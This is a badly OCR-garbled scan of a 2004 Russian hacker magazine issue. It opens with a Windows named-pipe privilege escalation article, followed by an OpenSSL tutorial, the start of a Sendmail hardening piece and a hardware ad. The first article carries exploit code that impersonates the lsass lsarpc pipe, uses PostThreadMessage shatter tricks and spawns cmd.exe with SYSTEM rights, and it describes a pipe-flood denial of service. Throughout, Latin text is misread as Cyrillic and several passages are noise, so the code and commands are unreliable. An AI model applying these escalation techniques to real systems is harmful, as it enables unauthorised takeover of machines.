установка прав доступа Е А55ЮІМРВІМАВУТО- 
КЕІМ ЕІАМЕ и ЗЕ ІЕІСВЕАЗЕ ОІЮТА 1М/ІЕ для 
дескриптора маркера пользователя. Эти права 
нам необходимы, чтобы использовать функцию 
Сгеа(еРгосеззАзІІзег(). Такими правами облада- 
ют исключительно системные процессы, поэто- 
му даже учетная запись «Абтіпізігаіог» не мо- 
жет успешно выполнить СгеаІеРгосеззАзЕІ5ег(). 
Следовательно, чтобы исполнить приложение, 
например стб.ехе, с правами системы, нам 
уже надо их иметь заранее. 

Вот тут и приходит на помощь возможность 
создания привилегированных процессов. 

Именно их права и будут использованы при 
вызове Сгеа(еРгосеззАзІІзег(). 

ПРОВЕДЕНИЕ ОТОКИ 

ШВВ 6е1Ргосе$$(сІіаг* ІрЕхеЕіІе) { 

ШВЕЕ (іРгосеззЗпар = N11(1' 

В00Б ЬВеІ = ЕАБ5Е 
РВ0СЕ38ЕОТВѴ32 ре32 = {0}; 

ЕРгосеззЗпар = СгеаІеТооІВеІр32$пар$ВоІ(ТН32С$^АРРК0СЕ$$, 0): 

К (ДРгосеззЗпар == тѴАЦШВДАІЛЕ) геіигп 0: 
реЗШіхе = $ігеоЕ(РК0СЕЗЗЕВТКѴ32): 
і( (Ргосе$і32Еіг5І(ІіРгосе$Йпар, 5ре32)) 

Ш 

і((!$(гшр(ре32.$2ЕхеЕІІе,5гЕхеГІІе)) 

{ 

геіигп ре32.Ні32Ргосе$$Ю; 

}} 

нііііе (Ргосе$532№х((ІіРгосе5$5пар, 8ре32)): 

} 

СІоаеНапгІІе (ИРгосеззЗпар); 
геіигп 0: 

} 

ВИНО 6еШігеагІ(Вгав (ИіРгосея) { 

НАМБ1Е ІіТІігеагІЗпар = ИНН: 

ШЕАВЕОТітгіІіЕпІгу; 

ІіТІігеагІЗпар = СгеаІеТооІЫр32$пар5И(ТН32С$_ШРТНІЩ 0); 

К (ІіТІігеагІЗпар =• шишИВОЩ геіигп 0: 

ИіЕпІгуМіхе = $І2еоР(ГНВЕАВЕКТВѴ32); 

К (Т(ігеасІ32ЕІГ5І(бТІігеасІ5пар. ЙІіЕпІгу)) 

{Й0{ 

і(( ОѵѵРгосезз == ІІіЕпІгу.ІШѵіпегРгосеааІВ ) 

{ 

геіигп НіЕп1гу.ІІі32ТІігеа(ІШ: 

}} 

ѵѵііііе (ШеаШІехШІігеагІЗпар, ЙІіЕпІгу)); 

} 

СІоееНапгІІе (ІіТбгеагіЗпар); 
геіигп 0: 

} 

іп! ІіТбгеасІ = ВеШігеагК 6еІРгосе$$("І5а$$.ехе") ): 
Ро$ІТІггеагМе5$аде((вгав) ІШігеаШІП) И ОШТ.0,0): 

Р 




а ѵѵѵѵѵѵ.Ьегрѳка.сот/ 

ІіЬгагу/зесзрес/зуз 

аг_01 .МтІ 

^мш.хакер.ги/розЕ/ 

19448/сИаиІЫііт 

л ЬНр://тзсІп.тісго5 

оК.сот/ІіЬгагу/еп- 

из/ірс/Ьазе/патесі_ 

рірез.азр 
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МАРТОВСКИМ номер 
ТОТАІ ОѴ0 
УЖЕ В ПРОДАЖ! 



ПРОБЛЕМНЫЕ МОМЕНТЫ 



к. 



- 



ХПКЕР/№03(63)/2004 







На ОѴО-припожемии 
эротический триллер 
«Связь». 



Тоіаі Р\Ш - 
журнал о кино, 
ОѴО и домашнем 
кинотеатре 



Н о это далеко не все проблемы, связанные с каналами. Еще 
несколько лет назад Вадим Проскурин описал кое-какие 
другие проблемные моменты в устройстве каналов. 

О. Допустим, существует некий процесс, который создал экзе- 
мпляр произвольного канала. Теперь, если другой процесс по- 
пытается создать канал с таким же именем, он будет успешно 
создан. Более того, этот поддельный канал сможет обслужи- 
вать клиентов, словно он настоящий. 

О. Если приложение начнет непрерывно создавать потоки, ко- 
торые будут подключаться к одному и тому же каналу системно- 
го процесса, это приведет к тому, что атакующий подключится 
ко всем экземплярам канала, и настоящий клиент не сможет 
воспользоваться пайпом. Но поскольку постоянно создаются 
новые экземпляры канала, под которые отводится место в па- 
мяти, при такой атаке может получиться, что вся свободная опе- 
ративная память компьютера просто исчерпает себя. Таким об- 
разом проводится БоЗ-атака ;). 



ЕЩЕ ПОТОКИ 



ЕегоМеімуШ, $І 2 еоІ($ТАКТ№М»; 
зі.сЬ = $І 2 еоТ(іі); 

$І.ІрОе$кІор = Ш; 

$ІАРІад$ = ШКТР_11$Е$Н0ЖШ11; 
$і.жМ№п(км = Ш_$Н(М; 
СгеаІеРгосеіаАаІІаегОіТокеігё.ШЛІ, 
"стіехеТ 5аа, 

іаіпіе, ШМАІТКІ0КІТПШ5 1 
СКЕАТЕ Ю1Ж0І.Е, N1111, N1)11, йі, 5рі); 
ѴѴаі(ГогЗіпдІеОЬТес((рі.ІіРгосе55. ШГІМТЕ); 
СІо$еНап(ІІе(ІіРіре); 




Самое время проверить работу эксплой- 
та на практике. Для этого необходимо най- 
ти приложение, работающее с файлами. 

Как ни странно, такое имеется ;). Его имя 
«аі», и с его помощью устанавливаются за- 
дания в системе. Чтобы проверить 
эксплойт, нам необходимо добавить имя 
канала в очередь заданий, после чего в 
назначенное время «аі» попытается запус- 
тить файл и тем самым обратится к нему. 

Как результат, запускается консоль с права- 
ми системы. Но есть небольшая проблема. Эта 
утилита доступна только администратору, и по- 



этому, если ты гостишь в системе, с ее по- 
мощью получить системные права не удастся. 

На практике подобная уязвимость может 
использоваться локальным пользователем 
для повышения привилегий в системе с уста- 
новленным Місгозой 501- Зегѵег. Он запуска- 
ется с правами системы, но может использо- 
ваться непривилегированными пользователя- 
ми. Уязвимость была найдена @зЕаке 
и связана с командой хр ЕІІеехізІ. Эта коман- 
да предназначена для проверки существова- 
ния файла, а поэтому позволяет поэксплуати- 
ровать уязвимость. 









А модификация птпки 

Из всего сказанного можно сделать вывод, что если атакующий 
не может указать открываемый файл, то атака невозможна. На 
самом деле это не так. Если нельзя указать имя открываемого 
файла, то можно создать канал с таким же именем, как тот, кото- 
рый использует системный процесс. Возьмем, к примеру, канал 
«\\.\ріре\І$агрс», создаваемый процессом Ізазз.ехе. Если запущен 
системный процесс, использующий этот канал, то после созда- 
ния канала с таким же именем появится вероятность подключе- 
ния процесса именно к фальшивому экземпляру. Правда, вероят- 
ность того, что это произойдет сразу, довольно мала. Дело в 
том, что если процесс запрашивает подключение к каналу, то 
система даст ему дескриптор первого в списке свободного кана- 
ла по дате создания. Значит, если заставить процесс обратиться 
к каналу множество раз, то он рано или поздно обратится к 
фальшивому. Но есть и другой вариант. Атакующий может сам 
подключиться ко всем свободным каналам и сразу же создать 
свой. Как результат, фальшивый канал будет первым в списке, 
и именно к нему и подключится клиент: 



РАБОТА С КАНАЛАМИ 



сбаг нРіре[64]; 

зргіпЩзгРіре. "\\\Ѵ\\ріре\\І5агрс"); 

Тог(іпІ іпІСоііпІег = 1;іп(СоііпІег<0хРГ МСошіІег») 

{ 

НАМИ НРІре =0: 

»ІііІе(!ІіРіре) 

{ 

Ріре = СгеаІеГІІеІ згРіре. 6ЕМПЕАВ 1 6ЕИЕВШІТЕ, 0, 
Ш, 0РЕШ5Ш6, 0, Ш); 

} 

} 

НАШ (іРіре = 0: 

ІіРіре = СгеаІеИатеіІРІреІ ІрРіре, РІРЕ.АССЕ55ЛРЕЕХ, 
РІРЕ_ТУРЕ_МЕ$5АСЕ|РІРЕ_ИАІТ, 2, 0, 0, 0, Ш ); 



Иногда, если каналом пользуется множество клиентов, то фаль- 
шивый экземпляр создается напрасно. Ведь нет гарантий, что пер- 
вым подключится системный процесс. Тогда придется немного мо- 
дифицировать эксплойт так, чтобы он одновременно создавал мно- 
жество каналов при помощи отдельных потоков. Но тем, кому такой 
способ кажется нерациональным, можно предложить кое-что иное. 

^КОИБИНПЦИЯОТПК 

Если системный процесс имеет окно, то, используя ВІіайег-атаки, 
можно закрыть процесс, создающий настоящие каналы. Добиться 
этого можно командой РозіТМ геасі Меззаде( ) . Код смотри на врез- 
ке «Проведение атаки». 

Далее достаточно только создать необходимый канал. В каче- 
стве способов для закрытия системных процессов можно исполь- 
зовать и атаки на переполнение буфера. И если имеет место пе- 
реполнение, то это уже возможность исполнения кода с правами 
системы, и в нашем случае использование пайпов для этих целей 
нерационально. 

А РЕШЕНИЕ ПРОБЛЕМЫ 

После множества проверок я так и не нашел системных приложе- 
ний, входящих в стандартную поставку ѴѴІпйоѵѵз, которые обра- 
щались бы к каналам. Но зато существует множество продуктов 
от сторонних разработчиков, с помощью которых все вышеопи- 
санное работает. 

Стоит также проверять конфигурационные файлы. Некото- 
рые приложения читают настройки из файлов, доступных на 
перезапись. Если где-то в нем указано имя файла, значит 
можно записать вместо него имя канала. Естественно, после 
этого приложение обратится к каналу. Поэтому предлагаю 
разработчикам не использовать в системных процессах подк- 
лючение к пайпам. Лучше, чтобы сервис создавал свой экзе- 
мпляр канала, а клиент с ограниченными правами просто 
подключался к нему. Таким образом используется механизм 
каналов в ОС ѴѴІпсІоѵѵз. 

На этом тему каналов можно закрыть. Но впереди еще множе- 
ство других интересных идей... Д-Л 
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А ПЕРЕКВПТ ПЕРЕОПВПЕМОЙ 
ЧЕРЕЗ СЕТЬ ИНФОРМПЦИИ 



Э лектронная почта, ѴѴЕВ-сервисы, 
ІВС и ІСО уже стали неотъемле- 
мой частью пользователей ин- 
тернета. Стоит ли напоминать, 
что протоколы наиболее часто 
используемых служб передают 
информацию в открытом виде, 
легко доступном для перехвата? 
Не требуется большого ума, чтобы запустить 
снифер и перехватить все, что передается по 
протоколам вышеперечисленных служб. Это 
могут быть пароли идентификации в интернет- 
магазине, пароли от почты, сама почта, ІПС- 
диалог. Подумай, кому будет приятно вторже- 
ние в личную жизнь, а уж тем более, если зло- 
умышленник перехватит ценную информацию? 



А НЕПОСРЕДСТВЕННЫЙ ДОСТУП 
К ФРИШ СИСТЕМЫ 

Представь: работая в офисе, ты вышел поку- 
рить и забыл сделать Іодоиі в системе. Пока 
ты отсутствуешь, коллега может получить 
доступ к любому файлу на твоем компьюте- 
ре, в котором, к примеру, хранятся данные о 
зарплате сотрудников или другие важные 
документы. Возможна и более банальная си- 
туация: хакер проник в систему и имеет пол- 
ный доступ к этим файлам. 



В обоих случаях информация подвергается 
опасности, а ее (информации) потеря или 
изменение могут привести к большим убыт- 
кам. Как было сказано выше, решением та- 
кой проблемы является шифрование, кото- 
рое призвано выполнять следующие задачи: 

О. Гарантировать конфиденциальность данных. 
О. Гарантировать неизменность данных 
при передаче или хранении. 

О. Проводить аутентификацию, т.е. подт- 
верждать подлинность при доступе к инфор- 
мации, а также при ее трансфере. 

Мощным средством шифрования в ЕІКІІХ яв- 
ляется пакет утилит и библиотек ОрепЗВІ.. 
Этот пакет, а точнее, входящие в него утили- 
ты, предоставляет следующие возможности: 

- Работа с ВЗА и ЭЗА ключами 

- Шифрование/дешифрование файлов 

- Создание хешей (контрольной суммы) файла 

- Создание шифрованных туннелей на сете- 
вом уровне 

- Создание сертификатов 

- Работа с 5/МІМЕ 

Я постараюсь как можно подробнее рас- 
смотреть каждый аспект применения утилит 
ОрепЗЗЕ, но, как понимаешь, размер статьи 
ограничен, поэтому что-то останется без 
внимания. 



Начнем с самого простого: с установки 
пакета ОрепЗЗЕ Вполне возможно, что он 
уже установлен в твоей системе, но не факт. 
Если его у тебя нет, то ОрепЗЗЕ обязательно 
должен быть в дистрибутиве, поэтому мо- 
жешь установить его оттуда. Архив с исход- 
ными кодами можно скачать с сайта 
»и.ореп$5І.огд. Я рекомендую тебе собирать 
ОрепЗЗЕ последней версии самому, а не ис- 
пользовать уже скомпиленные бинарники. 

На то есть свои причины. Во-первых, ты 
имеешь возможность оптимизировать при- 
ложение под конфигурацию именно твоей 
машины, а во-вторых, совсем недавно в па- 
кете ОрепЗЗЕ были обнаружены уязвимости, 
которые исправлены в последних версиях. 
Архив с исходными кодами последней вер- 
сии (0,97с или 0,96к) весит 2,7 мегабайта. 

Не стану уделять пристальное внимание 
процедуре компиляции - она достаточно 
проста. Все опции компиляции, а также сама 
процедура, описаны в файле ІИЗТАЕВ, кото- 
рый находится в архиве с исходниками. 

Перейдем к непосредственному рассмот- 
рению работы утилит орепззЕ 

А Н80И080 КЛЮЧИ 

Собственно, для начала нужно пояснить, 
что такое ключи и для чего они нужны. 

Ключ - это некоторый параметр, передава- 
емый алгоритму, позволяющий осущест- 
вить одно из возможных преобразований 
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шифруем информацию 



КОНТРОЛЬНЫЙ БИТ 

П ри передаче информации по Сети возможны всякие неприятности. Это не только перехват ин- 
фы злоумышленником, но и неверные данные на выходе. Такое случается часто. Информация 
имеет свойство теряться по пути, искажаться по каким-либо причинам. Поэтому, как бы пользо- 
ватель ни шифровал свои данные, такая банальная потеря информация будет ему не особо при- 
ятна. Для решения этой проблемы был придуман так называемый контрольный бит или бит чет- 
ности. В зависимости от того, сколько в передаваемом байте единичек, он может принимать зна- 
чение либо 1 , либо 0. Количество единичек в бите + в контрольном бите должно быть четным. Ес- 
ли на выходе получается нечетное число, значит, информация искажена. К сожалению, такой спо- 
соб не может контролировать ошибки, кратные 3, 5, 7 и т.д. 



•МЧІА . 



пи •'И» 

Р* і . Іт ■ к 



I ,'Г I !■ ■' ■ I , Т | ЗЪ# И 
?втяд 

СдоГ Л .*** 

в.іп.п 

«■.] ічі этИш. 

*ч эяіял.ЯЬ? 

г л* к- < і ■ I іі ■** іг 
ЬітРІіЯ 1йЭй-і»и';р‘т+-ІМти7 

іі-л-'і Г си . . - . ■ ■ 1'^ -Г ;иг 

до до* іѵ -.-ш»- ,, < ( м [ !"-л « і і [ 

■ ■ ■ ■ [ЖіТ‘ 



- I і. 

і І-' 1 1 'Ч ч -| і 

■рігЬ^іііт ■Ѵііі яН і.Эяві'пр 






Ч-ЮР) [• 



'СИ 



■«Я I™- 
Ч-||. ЧЪ 



Собираем орепззі 



для этого алгоритма и получить "уникаль- 
ное" значение. 

Если ты знаком с математическим опре- 
делением параметра, то тебе будет проще 
понять, что такое ключ. Параметр функции 
- это некоторое значение, передаваемое в 
саму функцию, в зависимости от которого 
множество возможных значений, принима- 
емых этой функцией, будет изменяться. 
Сейчас наиболее распространены два ме- 
тода шифрования: симметричное и асим- 
метричное. 

Симметричные методы шифрования поз- 
воляют использовать один и тот же ключ как 
для шифрования данных, так и для их рас- 
шифровки (шифрование с секретным клю- 
чом). Асимметричные же системы использу- 
ют два ключа - один для шифрования дан- 
ных, другой для их расшифровки (шифрова- 
ние с публичным ключом). 

Современные методы шифрования приз- 
ваны обеспечивать хорошую защиту данных. 
Поэтому возникает необходимость использо- 
вания сложных ключей, которые также соз- 
даются по определенному алгоритму, с ис- 
пользованием своих параметров. При гене- 
рации ключа необходимо ввести пароль, 
чтобы потом только ты мог использовать 
свой ключ. 

Рассмотрим, как ключи создаются при помо- 
щи ОрепЗЗЕ Создадим секретный В5А 
ключ, используя алгоритм гіезЗ: 

орепззі депгза -оиі зесгеікеу.реш -РезЗ -гапгі /ѵаг/Іод/тез- 

задез 4096 

Приведу краткое описание используемых опций: 
-оиі - указывает имя получаемого секретного 
ключа, в нашем случае это зесгеікеу.рет. 
-безЗ - алгоритм шифрования. 

-гапгі - источник случайных чисел для ключа, 
ты можешь указать в качестве источника лю- 



бой файл в своей системе, в уникальности 
которого ты можешь быть уверен. Я указал 
/ѵаг/Іод/теззадез. 

4096 - число байт получаемого ключа. 

Теперь создадим публичный ключ на основе 
секретного: 

орепззі гза -іл зесгеікеу.рет -оиі риЬкеу.рет -риЬоиІ 

Думаю, с используемыми опциями все по- 
нятно. Аналогичные действия производятся и 
при создании РЗА ключей. Создадим секрет- 
ный РЗА ключ, используя тот же алгоритм: 

орепззі депРза -оиі зесгеМзакеу.рет -гапР /ѵаг/Іод/теззадез 
-ІРеа рагатіііе 

Сгенерим публичный ключ на основе 
секретного: 

орепззі Рза -іп зесгеМзакеу.рет -оиі рпМзакеу.рет -риЬоиІ 

Стоит заметить, что при использовании 
шифров РЗА и И5А в коммерческих прило- 
жениях необходимо приобрести лицензию. 

А ШИФРОВПНИЕ/ДЕШИФРОВПНИЕ 
Файлов 

Не стану вдаваться в подробности самих ал- 
горитмов, напомню лишь, что любой файл 



представляет собой последовательность 
байтов. По заданному алгоритму происходит 
изменение этой последовательности. Таким 
образом, на выходе получается новая после- 
довательность - зашифрованный файл. 
ОрепЗЗІ. поддерживает шифрование файлов 
только по симметричному алгоритму. Если 
тебя интересует асимметричное шифрова- 
ние, рекомендую обратиться к утилите дрд. 
Рассмотрим, как осуществляется шифрова- 
ние с помощью ОрепЗЗЕ Синтаксис в дан- 
ном случае следующий: 

орепззі епс -без -іп (ІІе -оиі епсгуріегііііе 

Зашифровали файл с именем «Тііе» алгоритмом 
бе$3. Опция епс указывает на то, что нужно ис- 
пользовать симметричный алгоритм. Назначе- 
ние опций -іп и -оиі, надеюсь, понятно. 
Расшифруем уже зашифрованный файл: 

орепззі епс -без -іі -іп епсгуріегііііе -оиі ІІІе 

Как видишь, для расшифровки файла доста- 
точно задать тот же алгоритм и опцию "-б". 

А КЕШИРОВПНИЕ 

Вероятно, ты не раз встречал такое понятие, 
как сИескзит (контрольная сумма). Так вот, 
контрольная сумма есть не что иное, как не- 
который набор данных (байтов), полученный 
путем преобразования специальным алго- 
ритмом другого набора данных. Такой набор 
строго индивидуален для каждой последова- 
тельности исходных данных, что позволяет 
сравнить исходные данные посредством их 
контрольных сумм. Если контрольные суммы 
совпадают, то исходные данные идентичны. 
Контрольная сумма позволяет подтвердить 
неизменность (подлинность) полученных 
данных. Она не защищает тебя от перехвата 
информации, ее назначение - гарантировать 
неизменность данных. 

Рассмотрим, как с помощью ОрепВЗІ- 
можно создать сПескзит файла. Создадим 
контрольную сумму для файла с этой стать- 
ей и на выходе получим: 
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Делаем сертификат 




л Защита инфор- 
мации от нежела- 
тельных глаз - воп- 
рос, не теряющий 
актуальности дол- 
гие годы. Поэтому 
стоит позаботиться 
о своей безопас- 
ности. Не брезгуй 
различного рода 
утилитами, которые 
созданы специаль- 
но для решения 
этой проблемы. Тот 
же РСР надежно за- 
шифрует инфу на 
твоем винте и за- 
щитит тебя от утеч- 
ки информации к 
злобным хакерам. 
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апгІгеуМосаІііозМІорепззІ йдзі -т<15 -с ззі.іхі 




взпом 




эцп 



З лектронно-цифровые подписи и сертификаты подлинности в интернете все больше и больше 
получают признание у пользователей. Не раз перед скачиванием какого-либо программного 
обеспечения ты подтверждал принятие сертификата программы. Это сделано для того, чтобы 
злодей не смог подсунуть тебе вместо софта какого-нибудь троя или виря. Центр сертификации 
не даст простому смертному ЭЦП, не проверив его компетентность. 



^ 0 ^ 

л В качестве уни- 
версального реше- 
ния орепззі для лю- 
бых почтовых клиен- 
тов можно использо- 
вать зіиппеі 
(ѵѵш/.зіиппеі.огд). 
Версия этой прог- 
раммы есть не толь- 
ко под юникс-подоб- 
ные системы, но и 
под старый добрый 
ѴѴіпіІоѵѵз. 



М05($$І.М)= ЗЬ:7Т:Ьс:2(1:29:ЗШ:5с:48:1(І:26:11:а0:24:34:12 

Или: 

апгігеу@ІосаІІю$1:-#ореп$$І йд$1 -іш15 -с -оиі ззі.зід $$1.1x1 

Приведу краткое описание используемых опций: 

"тсі5" - алгоритм, по которому будет вычис- 
ляться контрольная сумма. 

"-с" - группирует цифры полученного хеша в 
группы по две. 

"ззІ.М" - название файла, с которым мы ра- 
ботаем. 

Если не указать дополнительных опций, 
контрольная сумма выводится на консоль. 
Опцией "-оиі зідТМе" можно задать имя фай- 
ла зідТМе, в который будет записываться 
контрольная сумма. 

На основе сііескзит (в некоторых источни- 
ках их называют также дайджестами) работа- 
ет принцип ЭЦП - электронная цифровая под- 
пись. При подписывании, к примеру, элект- 
ронного письма, происходит следующее: 

О. Вычисляется сііескзит файла письма. 
О. Полученный хеш шифруется секрет- 
ным ключом. 

Чтобы проверить подпись, тебе необходимо 
получить открытый ключ (риЫіс кеу) того че- 
ловека, который подписал письмо. Эта опе- 
рация производится либо на специализиро- 
ванном сервере, где отправитель поместил 
свой ключ, либо отправитель может лично 
передать его получателю. 

О. Расшифровывается полученный код с по- 
мощью риЫіс кеу и извлекается сбескзшп, ко- 
торая была получена на стороне отправителя. 

О. Извлекается сііескзит файла письма 
и сверяется с той, что получена из подписи. 

В вышеприведенных примерах используются 
далеко не все опции для работы с контрольной 
суммой. Для получения более полной инфор- 
мации рекомендую ознакомиться с тап сідзі. 

А С03Д0НИЕ СЕРТИФИКПТОВ 

Сертификат подтверждает подлинность того 
или иного ресурса, компании или личности, а 
точнее, указывает на то, что конкретный риЬ- 
Ііс кеу принадлежит определенному объекту. 
Сертификат включает в себя информацию о 
владельце, такую как имя, адрес, е-таіі, 
хост, а также содержит его открытый ключ. 
Сертификат подписывается с помощью ЭЦП 
центром сертификации, который служит га- 
рантом того, что этот сертификат принадле- 
жит конкретному объекту или личности. 

Рассмотрим следующую схему. Клиент и 
сервер хранят в своей базе список открытых 
ключей центров сертификации, которым они 
доверяют. При установлении соединения 



клиент получает цифровую подпись центра 
сертификации от сервера, после чего прове- 
ряет, принадлежит ли подпись центру. Если 
да, то при получении сертификата от сервера 
клиент проверяет подлинность самого серти- 
фиката. Удостоверившись, что сертификат 
верный, а следовательно, и данные в нем, в 
том числе и публичный ключ, клиент и сер- 
вер могут устанавливать защищенное соеди- 
нение. Сертификат можно сгенерировать и 
самому с помощью орепззі без третьей сто- 
роны - центра сертификатов. Но в этом слу- 
чае сертификат воспринимается аз із, на 
страх и риск клиента. Рассмотрим, как в 
ОрепЗЗІ. можно работать с сертификатами: 

орепззі гед -пек -х509 -кеуоиі зегеѵегкеу.рет -оиі 

зегеѵегсегі.рет -сіауз 365 

После этой команды тебе будет задано нес- 
колько вопросов. Далее ты введешь пароль, 
и в указанных каталогах создадутся два фай- 
ла: сертификата с публичным ключом и сек- 
ретного ключа. 

Можно также создать конфигурационный 
файл, из которого будут считаны данные при 
создании сертификата, и тебе не придется 
отвечать на все вопросы в интерактивном 
режиме. Конфигурационный файл задается 
после опции -сопіід. Формат файла несло- 
жен и хорошо описан на странице руковод- 
ства ''тап гец". 

А РОБОТП С 8/МІМЕ 

В орепззі также включен модуль по работе с 
таіі - орепззі зтіте. Он позволяет шифро- 
вать/дешифровать сообщения, а также ра- 
ботать с цифровой подписью. Что такое 
шифрование и цифровая подпись, мы рас- 
смотрели выше, так что не буду на этом ос- 
танавливаться и перейду непосредственно к 



описанию опций команд, доступных для 
орепззі зтіте. 

Первый простейший пример использования 
- подписывание письма: 

таіі.тзд -зідпег сегі.рет 

Здесь мы подписываем письмо из файла 
ТіІе.ЪсІ с помощью сертификата сегі.рет. 
Весь вывод идет в файл ІІІе.тзд. 

Зтіте позволяет обработать файл и сра- 
зу отправить его адресату с помощью зепб- 
таіі. Для этого достаточно указать опции -Іо 
гесіріепІ@таіІ.ги -Ігот зепгіег@таіІ.ги -зиб- 
іесі "Епсгуріеб теззаде”: 
орепззі зтіте -зідп -іп таіі.іхі -Іехі -Ігот 
зепбег@таіІ.ги -іо гесіріепі@таіІ.ги -зибіесі 
"Зідпеб теззаде" -зідпег сегі.рет -іпкеу ргі- 
ѵаіе кеу.рет | зепбтаіі гесіріепі@таіІ.ги 
В этом примере мы подписываем файл 
таіі.іхі, вставляем в него заголовки письма 
и передаем с помощью канала зепбтаіГу. 

орепззі зтіте -бесгурі -іп таіі.тзд -гесір 
сегі.рет -іпкеу кеу.рет -оиі таіі.іхі 
В этом примере мы расшифровываем со- 
общение таіі.тзд с помощью секретного 
ключа и сертификата сегі.рет. После чего 
кладем расшифрованное письмо в таіі.іхі. 

А ЗОКПЮЧЕНИЕ 

Теперь ты знаком с базовыми компонентами 
орепззі и уже можешь использовать их для 
обеспечения собственной безопасности. От- 
мечу, что в этой статье я привел далеко не 
полное описание всех опций команд, так что 
не стоит считать ее исчерпывающим руково- 
дством по орепззі. 

В следующей статье мы рассмотрим 
практическое применение орепззі с наибо- 
лее распространенными сервисами, такими 
как ѵ\лш, рорЗ, ітар, еіс. ЗС 
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вепо, 

Епіоутепі Маііегз 



Мультимедийный 
ЖК-монитор Веп(2 РР5678 

Размер диагонали - 1 5 дюймов ^ 
Физическое разрешение — 1 024x768 ^ 
Контрастность — 400: 1 
Яркость — 250 кд/м 8 ^ 
Полное время отклика — 1 6 мс ^ 





Планшетный сканер 
ВепО 82\У430(Ш 



•• Сканирующая матрица — СОТ 
^ Оптическое разрешение 600x1 200 точек/дюйм 
^ Разрядность представления цвета — 48 бит 
0 * Динамический диапазон 0,9—1 ,9 
^ Сканирование одной кнопкой 
^ Технология улучшения цветопередачи А.С.Е. 




СПРАШИВАЙТЕ В СЕТЯХ: МАГАЗИНЫ «АЭРТОН» В МОСКВЕ: 



«М. Видео» (095) 777 7775 



«МИР» (095) 780 0000 



«Эльдорадо» (095) 500 0000 



* Смоленский б-р, 4, 
ст. м. «Смоленская», 


* Ул. Б. Андроньевская, 23, 
ст. м. «Марксистская», 


«Имидж.Ру» 

Ул. Новослободская, 16, 


«Виртуальный Киоск»: 
тел.: (095) 234-37-77, 




тел.: 246-82-86, 246-45-46. 

* Ул. Ст. Басманная, 25, стр.1, 
ст. м. «Бауманская», 
тел.: 261-34-01. 


тел.: 232-33-24, 270-04-67. 

* Представительство в 
г. Санкт-Петербург, 
ул. Марата, 82, 


ст. м. «Менделеевская», 
тел.: 737-37-27. 


тел.: (812) 332-00-77. 
Бесплатная доставка и 
установка. Оформление 
кредита по телефону. 






гс&к 




тел.: (81 2) 312-20-43. 







Интернет-магазин тт.ѵ/ іепег.ги. Оплата при получении. Доставка в 150 городов России. Компания В&К имеет свои представительства и сервис-центры 
в 62 городах РФ и других стран СНГ. За дополнительной информацией обращаться потел.: (095) 234-96-78, ѵѵеЬ: бНр://ш/ѵѵ.г-апсІ-к,сот. 




/ ИПКЕР/№03(63)/2004 



I Пгкігизііоск (апіішзііоскігеаі.хакер.ш) 



■ то вреия как поклонники ОтаіІ и Ехіт с пеной у рта доказывают друг другу преимущества своих фаворитов, быстроразвивающийся 
и чрезвычайно шустрый РозІІіх приступом берет почтовые серверы по всему миру. Долл преждевременно списанного со счетов 
мистера ЗешІтаіІ’а составплет порядка семидесяти процентов. Остальные транспортные агенты, проходя это испытание, терпят 
поражение. На сегодняшний день так обстоят дела на почтовом фронте. О том, что же позволяет самому сложному в настройке и самому 
дырявому почтмейстеру удерживать лидирующие позиции, мы сегодня и поговорим. 



подними защиту своего почтовика на новую высоту 



Л О БЕДНОМ ЗЕЮШ’Е 
ЗПМППВИТЕ СЛОВО 

течение последних двадцати 
лет ни гетерогенные междуна- 
родные сети (Іпіегпеі, Вііпеі, 
ОЕСпеЕ), ни «неправильные» 
протоколы (МТР, ШСР, Х400), 
ни еженедельные изменения 
в рабочих документах ВЕС не 
могли помешать детищу Эри- 
ка Оллмана успешно справляться с задачами 
маршрутизации электронной почты. Благо- 
даря гибкости своего конфигурационного 
файла, ЗепсІтаіІ может «без проблем» адап- 
тироваться к любым условиям и вновь воз- 
никающим потребностям. 

«Без проблем» я не случайно взял в ка- 
вычки, так как о процессе конфигурирования 
ЗепбтаіГа ходят настоящие легенды. Поче- 
му? Да потому что синтаксис главного уп- 
равляющего файла зепсІтаіІ. с( настолько 
сложен, что инлайновые вставки по сравне- 
нию с ним тебе покажутся забавой скрипт- 





кидди. А основное руководство по програм- 
ме содержит больше тысячи страниц голого 
текста. Такое положение дел может привести 
в уныние самого дотошного энтузиаста, не 
говоря уже о простом пользователе. 

К счастью, нам не придется ковырять изо- 
билующий лексемами конфиг - в копии ба- 
зового «.тс» файла мы подготовим необхо- 
димые макровызовы, а препроцессор пл4 
всю грязную работу возьмет на себя. Необ- 
ходимые файлы-заготовки в зависимости от 
используемой операционной системы можно 
найти в каталогах /еіс/таіі (Ресіога Соге), 
/изг/збаге/зепгітаіІ/сГ (ОрепВББ), 
/изг/МЬ/таіІ/сГ (Зоіагіз): 

В <4 /изг/зЬаге/зепйтаіІ/сГ 

# ср орепМ-ргоІо.тс тШап.тс 

В ѵі тісііап.тс 

Так как этот свободно распространяемый 
транспортный агент входит в большинство 
ІЛЧІХ-подобных операционных систем и дист- 
рибутивов линукса (исключение составляют 
ОѵѵІ І_іпих и последние версии Зизе Упих), 
предлагаю сразу перейти непосредственно к 
конфигурированию. Стоит отметить, что раз- 
работка по модели открытого исходного кода - 
это еще один несомненный плюс ЗепбтаіІ’а, 
ведь именно из-за проблем с лицензировани- 
ем ОтаіІ и РозНіх по умолчанию не могут нахо- 
диться в составе твоей любимой операционки. 

^РПЗГОВОРНИКИ В СТРОЮ! 

Вопрос о необходимости сокрытия/подмены 
версий используемых программ уже давно 
перешел в разряд риторических, поэтому мы 
бы не стали вдаваться в подобные дискус- 
сии, если бы дело не касалось довольно 
многословной системы ЗепсІтаіІ. При уста- 



новлении соединения в приветственном со- 
общении демон отправляет полное домен- 
ное имя узла, свою версию и текущую дату. 
Помимо этого, в почтовых заголовках он вы- 
дает ІР-адреса своих клиентских хостов, тем 
самым раскрывая всему миру топологию 
внутренней сети. Чтобы подобного не прои- 
зошло, необходимо сделать следующее. 

О. Изменить приветственный баннер: 

йеІіпеГсопШРфООІІЕМЗб 1 . '$) таіі зегѵег геагіу аі $Ь') 

О. Отредактировать файл помощи (его 
можно запросить, прителнетившись на 25 
порт и введя команду беір): 

В ѵі /еІс/таіІ/ІіеІр(ІІе 

5п|р Тбіз і$ зепсІтаіІ ѵегзіоп ІМпоип 

О. Сгенерировать собственные почтовые 
заголовки: 

(ІеГіпеО сопГКЕСЕІѴЕО.НЕАРЕК 1 . ' $?зГгот $д 
ШаііІНуреНаііІІіепІісаІегІ иіііі ${аиІИуре}) 

